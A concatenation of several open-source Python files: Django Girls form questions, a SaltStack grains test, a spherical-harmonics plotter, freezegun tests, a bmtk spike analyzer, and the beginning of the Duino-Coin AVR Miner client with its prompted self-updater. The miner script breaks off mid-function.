"latest news from the Django Girls world. We send it once every two weeks."
),
required=True,
choices=(("yes", _("Yes, please!")), ("no", _("No, thank you."))),
)
return fields
DEFAULT_QUESTIONS = [
{
"title": _("What's your name?"),
"question_type": "paragraph",
},
{
"title": _("Your e-mail address:"),
"question_type": "email",
},
{
"title": _("Your phone number:"),
"help_text": _("Include your country prefix"),
"question_type": "paragraph",
},
{
"title": _("Where are you from?"),
"help_text": _("City, Country"),
"question_type": "paragraph",
},
{
"title": _("How old are you?"),
"question_type": "paragraph",
"is_required": False,
},
{
"title": _("Which operating system do you use?"),
"question_type": "choices",
"choices": "Mac OS X; Windows; Linux",
"is_multiple_choice": True,
},
{
"title": _("What is your current level of experience with programming?"),
"question_type": "choices",
"choices": _(
"I'm a total beginner, I don't know anything about it; "
"I've tried some HTML or CSS before; I've tried some JavaScript "
"before; I've done a few lessons of Python; I've built a website "
"before; I work as a programmer"
),
"is_multiple_choice": True,
},
{
"title": _(
"If you checked anything other than beginner, could you "
"tell us a bit more about your programming knowledge?"
),
"question_type": "text",
"is_required": False,
},
{
"title": _("What is your current occupation?"),
"help_text": _("What is your current job? Are you a student?"),
"question_type": "text",
},
{
"title": _("Why do you want to attend the workshop?"),
"help_text": _("Tell us about your motivations and aspirations."),
"question_type": "text",
},
{
"title": _("How are you planning to share what you've learnt with others?"),
"help_text": _(
"Django Girls is a volunteer-run organisation and we "
"look for people who are active and can help us help more women get "
"into the field. We want you to share what you learn at the workshop "
"with others in different ways: by organising a Django Girls event "
"in your city, talking about Django Girls on your local meetups, "
"writing a blog or simply teaching your friends."
),
"question_type": "text",
"is_required": False,
},
{
"title": _("How did you hear about Django Girls?"),
"question_type": "choices",
"choices": "; ".join(["Facebook", "Twitter", "From a friend", "PyLadies"]),
"is_required": False,
"is_multiple_choice": True,
},
{
"title": _("I acknowledge that some of my data will be used on Third Party Sites and Services."),
"help_text": _(
"Data collected through this form is used only for the "
"purpose of Django Girls events. We're using Third Party Sites "
"and Services to make it happen: for example, we're using "
"Sendgrid to send you emails. Don't worry: We don't share your data with spammers, "
"and we don't sell it! More info on our Privacy policy "
"<a href='/privacy-cookies/'>here</a>."
),
"question_type": "choices",
"choices": _("Yes"),
"is_required": True,
"is_multiple_choice": True,
},
{
"title": _(
"It is important that all attendees comply with the " "<a href='/coc/'>Django Girls Code of Conduct</a>"
),
"question_type": "choices",
"choices": _("I've read and understood the Django Girls Code of Conduct"),
"is_required": True,
"is_multiple_choice": True,
},
]
|
c6e49577f9835691cbe504050fc5472d0d02ad4f
|
d110546d747d7e3865ce5742d5fca09f404623c0
|
/tests/integration/grains/test_custom.py
|
17a09a4797ebf64b4a948e1cfc0eccd59effbf59
|
[
"Apache-2.0",
"MIT",
"BSD-2-Clause"
] |
permissive
|
saltstack/salt
|
354fc86a7be1f69514b3dd3b2edb9e6f66844c1d
|
1ef90cbdc7203f97775edb7666db86a41eb9fc15
|
refs/heads/master
| 2023-07-19T20:56:20.210556
| 2023-06-29T23:12:28
| 2023-07-19T11:47:47
| 1,390,248
| 11,026
| 6,296
|
Apache-2.0
| 2023-09-14T20:45:37
| 2011-02-20T20:16:56
|
Python
|
UTF-8
|
Python
| false
| false
| 519
|
py
|
test_custom.py
|
"""
Test the core grains
"""
import pytest
from tests.support.case import ModuleCase
@pytest.mark.windows_whitelisted
class TestGrainsCore(ModuleCase):
"""
Test the core grains grains
"""
@pytest.mark.slow_test
def test_grains_passed_to_custom_grain(self):
"""
test if current grains are passed to grains module functions that have a grains argument
"""
self.assertEqual(
self.run_function("grains.get", ["custom_grain_test"]), "itworked"
)
|
79113ddaeba9ba50bd9a5e7fdcf2ca3a2615e6f2
|
cfe182e58878e570e52102805912b4b7f63b16dc
|
/sph_harm.py
|
1d445b01d90132a1a1253d6f480d160aced3e5a0
|
[] |
no_license
|
QijingZheng/VaspBandUnfolding
|
dfbe04ac55af7fd88a0c3c4e0bcc6257de49fc32
|
43a5a4fafc2079912ba8b978958b0e238a9e818c
|
refs/heads/master
| 2023-08-18T17:56:50.140704
| 2023-08-12T04:50:29
| 2023-08-12T04:50:29
| 90,606,540
| 168
| 76
| null | 2023-07-16T03:41:00
| 2017-05-08T08:51:01
|
Python
|
UTF-8
|
Python
| false
| false
| 6,182
|
py
|
sph_harm.py
|
#!/usr/bin/env python
import numpy as np
from scipy.special import sph_harm
def cart2sph(xyz, epsilon=1E-10):
'''
Convert Cartesian coordinate to spherical coordinate.
input:
xyz in (n, 3)
return:
r: norm
theta: polar angle in [0, pi]
phi: azimuthal angle in [0, 2 * pi]
'''
xyz = np.asarray(xyz, dtype=float)
if xyz.ndim == 1:
xyz = xyz[None, :]
x, y, z = xyz.T
# the azimuthal angle
phi = np.arctan2(y, x)
# np.arctan2 outputs angle in [-pi, pi]
phi[phi < 0] += 2 * np.pi
# the norm
r = np.linalg.norm(np.c_[x, y, z], axis=1)
# in case of zero division
r[r < epsilon] = epsilon
# the polar angle
theta = np.arccos(z / r)
return np.array([r, phi, theta])
def sph_c(xyz, l, m=None):
'''
Complex spherial harmonics including the Condon-Shortley phase.
https://en.wikipedia.org/wiki/Table_of_spherical_harmonics#Spherical_harmonics
input:
xyz: cartesian coordinate of shape [n, 3]
'''
xyz = np.asarray(xyz, dtype=float)
if xyz.ndim == 1:
xyz = xyz[None, :]
if m:
assert -l <= m <= l, "'m' must be in the range of [{},{}]".format(-l, l)
r, phi, theta = cart2sph(xyz)
N = xyz.shape[0]
ylm = [sph_harm(M, l, phi, theta) for M in range(-l, l+1)]
if m is None:
return np.array(ylm, dtype=complex).T
else:
return np.array(ylm, dtype=complex).T[:, m+l]
def sph_r(xyz, l, m=None):
'''
Real spherial harmonics.
https://en.wikipedia.org/wiki/Table_of_spherical_harmonics#Real_spherical_harmonics
'''
ylm_c = sph_c(xyz, l)
u = sph_u_c2r(l)
if m is None:
return np.dot(ylm_c, u.T).real
else:
return np.dot(ylm_c, u.T).real[:, m+l]
def sph_u_c2r(l):
'''
Set up transformation matrix complex->real spherical harmonics.
please refer to:
https://en.wikipedia.org/wiki/Spherical_harmonics#Real_form
U_R2C is the conjugate transpose of U_C2R
'''
# A strange bug:
# https://stackoverflow.com/questions/9887549/negative-exponent-with-numpy-array-operand/42776488
l = int(l)
TLP1 = 2 * l + 1
U_C2R = np.zeros((TLP1, TLP1), dtype=complex)
sqrt2inv = 1.0 / np.sqrt(2.0)
for ii in range(TLP1):
M = ii - l
if (M < 0):
U_C2R[ii, ii] = 1j * sqrt2inv
U_C2R[ii, -(ii+1)] = -1j * (-1)**M * sqrt2inv
if (M == 0):
U_C2R[ii, ii] = 1.0
if (M > 0):
U_C2R[ii, -(ii+1)] = sqrt2inv
U_C2R[ii, ii] = (-1)**M * sqrt2inv
return U_C2R
def sph_u_r2c(l):
'''
Transformation matrix real->complex spherical harmonics
'''
return sph_u_c2r(l).conj().T
def show_sph_harm(l, m, real=True, N=50, use_sphere=True, plot='mpl'):
'''
Show the spherical harmonics on a unit sphere
'''
assert plot.lower() in ['mpl', 'mayavi', 'plotly']
theta = np.linspace(0, np.pi, N)
phi = np.linspace(0, 2*np.pi, N)
theta, phi = np.meshgrid(theta, phi)
# The Cartesian coordinates of the unit sphere
x = np.sin(theta) * np.cos(phi)
y = np.sin(theta) * np.sin(phi)
z = np.cos(theta)
xyz = np.c_[x.ravel(), y.ravel(), z.ravel()]
# from time import time
# t0 = time()
if real:
ylm = sph_r(xyz, l, m).reshape(N, N)
else:
ylm = sph_c(xyz, l, m).reshape(N, N).real
# t1 = time()
# print(t1 - t0)
# Calculate the spherical harmonic Y(l,m) and normalize to [0,1]
fcolors = ylm
fmax, fmin = fcolors.max(), fcolors.min()
fcolors = (fcolors - fmin)/(fmax - fmin)
if not use_sphere:
r0 = np.abs(ylm)
if plot.lower() == 'mpl':
import matplotlib.pyplot as plt
from matplotlib import cm, colors
from mpl_toolkits.mplot3d import Axes3D
# Set the aspect ratio to 1 so our sphere looks spherical
fig = plt.figure(
figsize=plt.figaspect(1.)
)
ax = fig.add_subplot(111, projection='3d')
if use_sphere:
ax.plot_surface(x, y, z, rstride=1, cstride=1,
facecolors=cm.seismic(fcolors))
xmax = ymax = zmax = np.max([x, y, z])
xmin = ymin = zmin = np.min([x, y, z])
else:
ax.plot_surface(x*r0, y*r0, z*r0, rstride=1, cstride=1,
facecolors=cm.seismic(fcolors))
xmax = ymax = zmax = np.max([r0*x, r0*y, r0*z])
xmin = ymin = zmin = np.min([r0*x, r0*y, r0*z])
# Turn off the axis planes
# ax.set_axis_off()
ax.set_xlim(xmin, xmax)
ax.set_ylim(ymin, ymax)
ax.set_zlim(zmin, zmax)
ax.set_xticks([])
ax.set_yticks([])
ax.set_zticks([])
ax.set_xlabel('x')
ax.set_ylabel('y')
ax.set_zlabel('z')
plt.show()
elif plot == 'mayavi':
from mayavi import mlab
fig = mlab.figure(
size=(800, 800),
bgcolor=(1,1,1)
)
if use_sphere:
mlab.mesh(x, y, z, colormap='seismic', scalars=fcolors)
else:
mlab.mesh(x*r0, y*r0, z*r0, colormap='seismic', scalars=fcolors)
mlab.orientation_axes()
mlab.show()
else:
import plotly.graph_objects as go
if use_sphere:
fig = go.Figure(
data=[
go.Surface(
z=z, x=x, y=y,
surfacecolor=fcolors,
colorscale='balance', showscale=False, opacity=1.0,
hoverinfo='none'
)
],
)
else:
fig = go.Figure(
data=[
go.Surface(
z=r0*z, x=r0*x, y=r0*y,
surfacecolor=fcolors,
colorscale='balance', showscale=False, opacity=1.0,
hoverinfo='none'
)
],
)
fig.update_layout(
width=800, height=800,
)
fig.show()
if __name__ == "__main__":
show_sph_harm(l=2, m=1, real=True, use_sphere=False, plot='mayavi')
|
ba339338a73958d251fd31798b05a82ee800f4f9
|
0ec2b0a2caf2cc5e0ec2bbb89aefc10fc5c63047
|
/tests/test_class_import.py
|
709dc6e17cba874a810c894d284840eac87cad87
|
[
"Apache-2.0"
] |
permissive
|
spulec/freezegun
|
3d8406eaf4c3ffa72f884162a278a332eaee4a94
|
4f4496380deefceead7bef23bccaca17c2bdecfa
|
refs/heads/master
| 2023-08-30T22:29:16.153344
| 2023-02-22T05:49:22
| 2023-02-22T05:49:22
| 7,106,250
| 3,480
| 294
|
Apache-2.0
| 2023-08-24T21:19:36
| 2012-12-11T05:11:00
|
Python
|
UTF-8
|
Python
| false
| false
| 6,101
|
py
|
test_class_import.py
|
import time
import sys
from .fake_module import (
fake_date_function,
fake_datetime_function,
fake_gmtime_function,
fake_localtime_function,
fake_strftime_function,
fake_time_function,
)
from . import fake_module
from freezegun import freeze_time
from freezegun.api import (
FakeDatetime,
FakeDate,
fake_time,
fake_localtime,
fake_gmtime,
fake_strftime,
)
import datetime
@freeze_time("2012-01-14")
def test_import_datetime_works():
assert fake_datetime_function().day == 14
@freeze_time("2012-01-14")
def test_import_date_works():
assert fake_date_function().day == 14
@freeze_time("2012-01-14")
def test_import_time():
local_time = datetime.datetime(2012, 1, 14)
utc_time = local_time - datetime.timedelta(seconds=time.timezone)
expected_timestamp = time.mktime(utc_time.timetuple())
assert fake_time_function() == expected_timestamp
def test_start_and_stop_works():
freezer = freeze_time("2012-01-14")
result = fake_datetime_function()
assert result.__class__ == datetime.datetime
assert result.__class__ != FakeDatetime
freezer.start()
assert fake_datetime_function().day == 14
assert isinstance(fake_datetime_function(), datetime.datetime)
assert isinstance(fake_datetime_function(), FakeDatetime)
freezer.stop()
result = fake_datetime_function()
assert result.__class__ == datetime.datetime
assert result.__class__ != FakeDatetime
def test_isinstance_works():
date = datetime.date.today()
now = datetime.datetime.now()
freezer = freeze_time('2011-01-01')
freezer.start()
assert isinstance(date, datetime.date)
assert not isinstance(date, datetime.datetime)
assert isinstance(now, datetime.datetime)
assert isinstance(now, datetime.date)
freezer.stop()
def test_issubclass_works():
real_date = datetime.date
real_datetime = datetime.datetime
freezer = freeze_time('2011-01-01')
freezer.start()
assert issubclass(real_date, datetime.date)
assert issubclass(real_datetime, datetime.datetime)
freezer.stop()
def test_fake_uses_real_when_ignored():
real_time_before = time.time()
with freeze_time('2012-01-14', ignore=['tests.fake_module']):
real_time = fake_time_function()
real_time_after = time.time()
assert real_time_before <= real_time <= real_time_after
def test_can_ignore_email_module():
from email.utils import formatdate
with freeze_time('2012-01-14'):
faked_date_str = formatdate()
before_date_str = formatdate()
with freeze_time('2012-01-14', ignore=['email']):
date_str = formatdate()
after_date_str = formatdate()
assert date_str != faked_date_str
assert before_date_str <= date_str <= after_date_str
@freeze_time('2011-01-01')
def test_avoid_replacing_equal_to_anything():
assert fake_module.equal_to_anything.description == 'This is the equal_to_anything object'
@freeze_time("2012-01-14 12:00:00")
def test_import_localtime():
struct = fake_localtime_function()
assert struct.tm_year == 2012
assert struct.tm_mon == 1
assert struct.tm_mday >= 13 # eg. GMT+14
assert struct.tm_mday <= 15 # eg. GMT-14
@freeze_time("2012-01-14 12:00:00")
def test_fake_gmtime_function():
struct = fake_gmtime_function()
assert struct.tm_year == 2012
assert struct.tm_mon == 1
assert struct.tm_mday == 14
@freeze_time("2012-01-14")
def test_fake_strftime_function():
assert fake_strftime_function() == '2012'
def test_import_after_start():
with freeze_time('2012-01-14'):
assert 'tests.another_module' not in sys.modules.keys()
from tests import another_module
# Reals
assert another_module.get_datetime() is datetime.datetime
assert another_module.get_datetime() is FakeDatetime
assert another_module.get_date() is datetime.date
assert another_module.get_date() is FakeDate
assert another_module.get_time() is time.time
assert another_module.get_time() is fake_time
assert another_module.get_localtime() is time.localtime
assert another_module.get_localtime() is fake_localtime
assert another_module.get_gmtime() is time.gmtime
assert another_module.get_gmtime() is fake_gmtime
assert another_module.get_strftime() is time.strftime
assert another_module.get_strftime() is fake_strftime
# Fakes
assert another_module.get_fake_datetime() is FakeDatetime
assert another_module.get_fake_date() is FakeDate
assert another_module.get_fake_time() is fake_time
assert another_module.get_fake_localtime() is fake_localtime
assert another_module.get_fake_gmtime() is fake_gmtime
assert another_module.get_fake_strftime() is fake_strftime
# Reals
assert another_module.get_datetime() is datetime.datetime
assert not another_module.get_datetime() is FakeDatetime
assert another_module.get_date() is datetime.date
assert not another_module.get_date() is FakeDate
assert another_module.get_time() is time.time
assert not another_module.get_time() is fake_time
assert another_module.get_localtime() is time.localtime
assert not another_module.get_localtime() is fake_localtime
assert another_module.get_gmtime() is time.gmtime
assert not another_module.get_gmtime() is fake_gmtime
assert another_module.get_strftime() is time.strftime
assert not another_module.get_strftime() is fake_strftime
# Fakes
assert another_module.get_fake_datetime() is FakeDatetime
assert another_module.get_fake_date() is FakeDate
assert another_module.get_fake_time() is fake_time
assert another_module.get_fake_localtime() is fake_localtime
assert another_module.get_fake_gmtime() is fake_gmtime
assert another_module.get_fake_strftime() is fake_strftime
del sys.modules['tests.another_module']
def test_none_as_initial():
with freeze_time() as ft:
ft.move_to('2012-01-14')
assert fake_strftime_function() == '2012'
|
d4958d660aaa09702436e99cf5ee5b8de77c81bd
|
d813a392c7cbc8dbbec273b3a2366a50f9df45c9
|
/bmtk/analyzer/spikes_analyzer.py
|
af77187a618f82ecc153c796587a665d2f51cd96
|
[
"BSD-3-Clause"
] |
permissive
|
AllenInstitute/bmtk
|
1496d6e0bd7cbef7b1b8cac64a8589d01548f897
|
ae9c24c415a3fbd60397b4ead160b72b4b3e4e4f
|
refs/heads/develop
| 2023-08-24T20:09:32.763686
| 2023-08-20T18:29:19
| 2023-08-20T18:29:19
| 104,507,294
| 253
| 111
|
BSD-3-Clause
| 2023-08-24T14:38:57
| 2017-09-22T18:42:44
|
Python
|
UTF-8
|
Python
| false
| false
| 4,787
|
py
|
spikes_analyzer.py
|
# Copyright 2017. Allen Institute. All rights reserved
#
# Redistribution and use in source and binary forms, with or without modification, are permitted provided that the
# following conditions are met:
#
# 1. Redistributions of source code must retain the above copyright notice, this list of conditions and the following
# disclaimer.
#
# 2. Redistributions in binary form must reproduce the above copyright notice, this list of conditions and the following
# disclaimer in the documentation and/or other materials provided with the distribution.
#
# 3. Neither the name of the copyright holder nor the names of its contributors may be used to endorse or promote
# products derived from this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES,
# INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
# DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
# SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,
# WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
#
import pandas as pd
import numpy as np
try:
from distutils.version import LooseVersion
use_sort_values = LooseVersion(pd.__version__) >= LooseVersion('0.19.0')
except:
use_sort_values = False
def spikes2dict(spikes_file):
spikes_df = pd.read_csv(spikes_file, sep=' ', names=['time', 'gid'])
if use_sort_values:
spikes_sorted = spikes_df.sort_values(['gid', 'time'])
else:
spikes_sorted = spikes_df.sort(['gid', 'time'])
spike_dict = {}
for gid, spike_train in spikes_sorted.groupby('gid'):
spike_dict[gid] = np.array(spike_train['time'])
return spike_dict
def spike_files_equal(spikes_txt_1, spikes_txt_2, err=0.0001):
trial_1 = spikes2dict(spikes_txt_1)
trial_2 = spikes2dict(spikes_txt_2)
if set(trial_1.keys()) != set(trial_2.keys()):
return False
for gid, spike_train1 in trial_1.items():
spike_train2 = trial_2[gid]
if len(spike_train1) != len(spike_train2):
return False
for s1, s2 in zip(spike_train1, spike_train2):
if abs(s1 - s2) > err:
return False
return True
def get_mean_firing_rates(spike_gids, node_ids, tstop_msec):
"""
Compute mean firing rate over the duration of the simulation
:param spike_gids: gids of cells which spiked
:param node_ids: np.array of node_ids
:return mean_firing_rate: np.array mean firing rates
"""
min_gid = np.min(node_ids)
max_gid = np.max(node_ids)
gid_bins = np.arange(min_gid-0.5,max_gid+1.5,1)
hist,bins = np.histogram(spike_gids, bins=gid_bins)
tstop_sec = tstop_msec*1E-3
mean_firing_rates = hist/tstop_sec
return mean_firing_rates
def spikes_equal_in_window(spikes1,spikes2,twindow):
"""
Compare spikes within a time window
:param spikes1: dict with "time" and "gid" arrays for raster 1
:param spikes2: dict with "time" and "gid" arrays for raster 2
:param twindow: [tstart,tend] time window
:return boolean: True if equal, False if different
"""
ix1_window0=np.where(spikes1["time"]>twindow[0])
ix1_window1=np.where(spikes1["time"]<twindow[1])
ix1_window = np.intersect1d(ix1_window0,ix1_window1)
ix2_window0=np.where(spikes2["time"]>twindow[0])
ix2_window1=np.where(spikes2["time"]<twindow[1])
ix2_window = np.intersect1d(ix2_window0,ix2_window1)
print(len(spikes1["time"][ix1_window]),len(spikes2["time"][ix2_window]))
if len(spikes1["time"][ix1_window]) != len(spikes2["time"][ix2_window]):
print("There is a DIFFERENT number of spikes in each file within the window")
print("No point to compare individual spikes")
return
else:
print("number of spikes are the same, checking details...")
ix1_sort = np.argsort(spikes1["time"][ix1_window],kind="mergesort")
ix2_sort = np.argsort(spikes2["time"][ix2_window],kind="mergesort")
if (np.array_equal(spikes1["gid"][ix1_window[ix1_sort]],spikes2["gid"][ix2_window[ix2_sort]])) and (np.array_equal(spikes1["time"][ix1_window[ix1_sort]],spikes2["time"][ix2_window[ix2_sort]])):
print("spikes are IDENTICAL!")
return True
else:
print("spikes are DIFFERENT")
return False
|
7ef9262273a3c7f5ef9e3659c8253c016a2f63ad
|
b99c294295f1b1d6da8f90562490567b24fd8c8f
|
/AVR_Miner.py
|
be47070cc66e85068cba8e8f54f7e39bd144d175
|
[
"MIT"
] |
permissive
|
revoxhere/duino-coin
|
5d1f97425e29bf885f639f74fc5fc2fb483859b5
|
9cea64d8bd59f9138dc2f160f2caaf5c3f373c8d
|
refs/heads/master
| 2023-08-17T10:43:46.972577
| 2023-08-16T18:02:04
| 2023-08-16T18:02:04
| 200,611,314
| 2,839
| 833
|
MIT
| 2023-09-07T23:41:21
| 2019-08-05T08:07:46
|
Python
|
UTF-8
|
Python
| false
| false
| 50,322
|
py
|
AVR_Miner.py
|
#!/usr/bin/env python3
"""
Duino-Coin Official AVR Miner 3.5 © MIT licensed
https://duinocoin.com
https://github.com/revoxhere/duino-coin
Duino-Coin Team & Community 2019-2023
"""
from os import _exit, mkdir
from os import name as osname
from os import path
from os import system as ossystem
from platform import machine as osprocessor
from platform import system
import sys
from configparser import ConfigParser
from pathlib import Path
from json import load as jsonload
from random import choice
from locale import LC_ALL, getdefaultlocale, getlocale, setlocale
import zipfile
from re import sub
from socket import socket
from datetime import datetime
from statistics import mean
from signal import SIGINT, signal
from time import ctime, sleep, strptime, time
import pip
from subprocess import DEVNULL, Popen, check_call, call
from threading import Thread
from threading import Lock as thread_lock
from threading import Semaphore
import base64 as b64
import os
printlock = Semaphore(value=1)
# Python <3.5 check
f"Your Python version is too old. Duino-Coin Miner requires version 3.6 or above. Update your packages and try again"
def install(package):
try:
pip.main(["install", package])
except AttributeError:
check_call([sys.executable, '-m', 'pip', 'install', package])
call([sys.executable, __file__])
try:
from serial import Serial
import serial.tools.list_ports
except ModuleNotFoundError:
print("Pyserial is not installed. "
+ "Miner will try to automatically install it "
+ "If it fails, please manually execute "
+ "python3 -m pip install pyserial")
install('pyserial')
try:
import requests
except ModuleNotFoundError:
print("Requests is not installed. "
+ "Miner will try to automatically install it "
+ "If it fails, please manually execute "
+ "python3 -m pip install requests")
install('requests')
try:
from colorama import Back, Fore, Style, init
init(autoreset=True)
except ModuleNotFoundError:
print("Colorama is not installed. "
+ "Miner will try to automatically install it "
+ "If it fails, please manually execute "
+ "python3 -m pip install colorama")
install("colorama")
try:
from pypresence import Presence
except ModuleNotFoundError:
print("Pypresence is not installed. "
+ "Miner will try to automatically install it "
+ "If it fails, please manually execute "
+ "python3 -m pip install pypresence")
install("pypresence")
try:
import psutil
except ModuleNotFoundError:
print("Psutil is not installed. "
+ "Miner will try to automatically install it "
+ "If it fails, please manually execute "
+ "python3 -m pip install psutil")
install("psutil")
def now():
return datetime.now()
def port_num(com):
return str(''.join(filter(str.isdigit, com)))
class Settings:
VER = '3.5'
SOC_TIMEOUT = 15
REPORT_TIME = 120
AVR_TIMEOUT = 10
BAUDRATE = 115200
DATA_DIR = "Duino-Coin AVR Miner " + str(VER)
SEPARATOR = ","
ENCODING = "utf-8"
TEMP_FOLDER = "Temp"
try:
# Raspberry Pi latin users can't display this character
"‖".encode(sys.stdout.encoding)
BLOCK = " ‖ "
except:
BLOCK = " | "
PICK = ""
COG = " @"
if (osname != "nt"
or bool(osname == "nt"
and os.environ.get("WT_SESSION"))):
# Windows' cmd does not support emojis, shame!
# And some codecs same, for example the Latin-1 encoding don`t support emoji
try:
"⛏ ⚙".encode(sys.stdout.encoding) # if the terminal support emoji
PICK = " ⛏"
COG = " ⚙"
except UnicodeEncodeError: # else
PICK = ""
COG = " @"
def check_updates():
"""
Function that checks if the miner is updated.
Downloads the new version and restarts the miner.
"""
try:
data = requests.get(
"https://api.github.com/repos/revoxhere/duino-coin/releases/latest"
).json()
zip_file = "Duino-Coin_" + data["tag_name"] + "_linux.zip"
if sys.platform == "win32":
zip_file = "Duino-Coin_" + data["tag_name"] + "_windows.zip"
process = psutil.Process(os.getpid())
running_script = False # If the process is from script
if "python" in process.name():
running_script = True
if float(Settings.VER) < float(data["tag_name"]): # If is outdated
update = input(Style.BRIGHT + get_string("new_version"))
if update == "Y" or update == "y":
pretty_print("sys0", get_string("updating"), "warning")
DATA_DIR = "Duino-Coin AVR Miner " + str(data["tag_name"]) # Create new version config folder
if not path.exists(DATA_DIR):
mkdir(DATA_DIR)
try:
config.read(str(Settings.DATA_DIR) + '/Settings.cfg') # read the previous config
config["AVR Miner"] = {
'username': config["AVR Miner"]['username'],
'avrport': config["AVR Miner"]['avrport'],
'donate': int(config["AVR Miner"]['donate']),
'language': config["AVR Miner"]['language'],
'identifier': config["AVR Miner"]['identifier'],
'debug': config["AVR Miner"]['debug'],
"soc_timeout": int(config["AVR Miner"]["soc_timeout"]),
"avr_timeout": float(config["AVR Miner"]["avr_timeout"]),
"discord_presence": config["AVR Miner"]["discord_presence"],
"periodic_report": int(config["AVR Miner"]["periodic_report"]),
"mining_key": config["AVR Miner"]["mining_key"]
}
with open(str(DATA_DIR) # save it on the new version folder
+ '/Settings.cfg', 'w') as configfile:
config.write(configfile)
pretty_print("sys0", Style.RESET_ALL + get_string('config_saved'), "success")
except Exception as e:
pretty_print("sys0", f"Error saving configfile: {e}" + str(e), "error")
pretty_print("sys0", "Config won't be carried to the next version", "warning")
if not os.path.exists(Settings.TEMP_FOLDER): # Make the Temp folder
os.makedirs(Settings.TEMP_FOLDER)
file_path = os.path.join(Settings.TEMP_FOLDER, zip_file)
download_url = "https://github.com/revoxhere/duino-coin/releases/download/" + data["tag_name"] + "/" + zip_file
if running_script:
file_path = os.path.join(".", "AVR_Miner_"+data["tag_name"]+".py")
download_url = "https://raw.githubusercontent.com/revoxhere/duino-coin/master/AVR_Miner.py"
r = requests.get(download_url, stream=True)
if r.ok:
start = time()
dl = 0
file_size = int(r.headers["Content-Length"]) # Get file size
pretty_print("sys0",
f"Saving update to: {os.path.abspath(file_path)}", "warning")
with open(file_path, 'wb') as f:
for chunk in r.iter_content(chunk_size=1024 * 8): # Download file in chunks
if chunk:
dl += len(chunk)
done = int(50 * dl / file_size)
dl_perc = str(int(100 * dl / file_size))
if running_script:
done = int(12.5 * dl / file_size)
dl_perc = str(int(22.5 * dl / file_size))
sys.stdout.write(
"\r%s [%s%s] %s %s" % (
dl_perc + "%",
'#' * done,
' ' * (50-done),
str(round(os.path.getsize(file_path) / 1024 / 1024, 2)) + " MB ",
str((dl // (time() - start)) // 1024) + " KB/s")) # ProgressBar
sys.stdout.flush()
f.write(chunk)
f.flush()
os.fsync(f.fileno())
pretty_print("sys0", "Download complete", "success")
if not running_script:
pretty_print("sys0", "Unpacking archive", "warning")
with zipfile.ZipFile(file_path, 'r') as zip_ref: # Unzip the file
for file in zip_ref.infolist():
if "AVR_Miner" in file.filename:
if sys.platform == "win32":
file.filename = "AVR_Miner_"+data["tag_name"]+".exe" # Rename the file
else:
file.filename = "AVR_Miner_"+data["tag_name"]
zip_ref.extract(file, ".")
pretty_print("sys0", "Unpacking complete", "success")
os.remove(file_path) # Delete the zip file
os.rmdir(Settings.TEMP_FOLDER) # Delete the temp folder
if sys.platform == "win32":
os.startfile(os.getcwd() + "\\AVR_Miner_"+data["tag_name"]+".exe") # Start the miner
else: # os.startfile is only for windows
os.system(os.getcwd() + "/AVR_Miner_"+data["tag_name"])
else:
if sys.platform == "win32":
os.system(file_path)
else:
os.system("python3 " + file_path)
sys.exit() # Exit the program
else: # HTTP status code 4XX/5XX
pretty_print( "sys0", f"Update failed: {r.status_code}: {r.text}", "error")
else:
pretty_print("sys0", "Update aborted", "warning")
except Exception as e:
print(e)
sys.exit()
def check_mining_key(user_settings):
user_settings = user_settings["AVR Miner"]
if user_settings["mining_key"] != "None":
key = "&k=" + b64.b64decode(user_settings["mining_key"]).decode('utf-8')
else:
key = ''
response = requests.get(
"https://server.duinocoin.com/mining_key"
+ "?u=" + user_settings["username"]
+ key,
timeout=10
).json()
if response["success"] and not response["has_key"]: # if the user doesn't have a mining key
user_settings["mining_key"] = "None"
config["AVR Miner"] = user_settings
with open(Settings.DATA_DIR + '/Settings.cfg',
"w") as configfile:
config.write(configfile)
print("sys0",
Style.RESET_ALL + get_string("config_saved"),
"info")
return
if not response["success"]:
if user_settings["mining_key"] == "None":
pretty_print(
"sys0",
get_string("mining_key_required"),
"warning")
mining_key = input("Enter your mining key: ")
user_settings["mining_key"] = b64.b64encode(mining_key.encode("utf-8")).decode('utf-8')
config["AVR Miner"] = user_settings
with open(Settings.DATA_DIR + '/Settings.cfg',
"w") as configfile:
config.write(configfile)
print("sys0",
Style.RESET_ALL + get_string("config_saved"),
"info")
check_mining_key(config)
else:
pretty_print(
"sys0",
get_string("invalid_mining_key"),
"error")
retry = input("Do you want to retry? (y/n): ")
if retry == "y" or retry == "Y":
mining_key = input("Enter your mining key: ")
user_settings["mining_key"] = b64.b64encode(mining_key.encode("utf-8")).decode('utf-8')
config["AVR Miner"] = user_settings
with open(Settings.DATA_DIR + '/Settings.cfg',
"w") as configfile:
config.write(configfile)
print("sys0",
Style.RESET_ALL + get_string("config_saved"),
"info")
sleep(1.5)
check_mining_key(config)
else:
return
class Client:
"""
Class helping to organize socket connections
"""
def connect(pool: tuple):
s = socket()
s.settimeout(Settings.SOC_TIMEOUT)
s.connect((pool))
return s
def send(s, msg: str):
sent = s.sendall(str(msg).encode(Settings.ENCODING))
return True
def recv(s, limit: int = 128):
data = s.recv(limit).decode(Settings.ENCODING).rstrip("\n")
return data
def fetch_pool():
while True:
pretty_print("net0", get_string("connection_search"),
"info")
try:
response = requests.get(
"https://server.duinocoin.com/getPool",
timeout=10).json()
if response["success"] == True:
pretty_print("net0", get_string("connecting_node")
+ response["name"],
"info")
NODE_ADDRESS = response["ip"]
NODE_PORT = response["port"]
return (NODE_ADDRESS, NODE_PORT)
elif "message" in response:
pretty_print(f"Warning: {response['message']}"
+ ", retrying in 15s", "warning", "net0")
sleep(15)
else:
raise Exception(
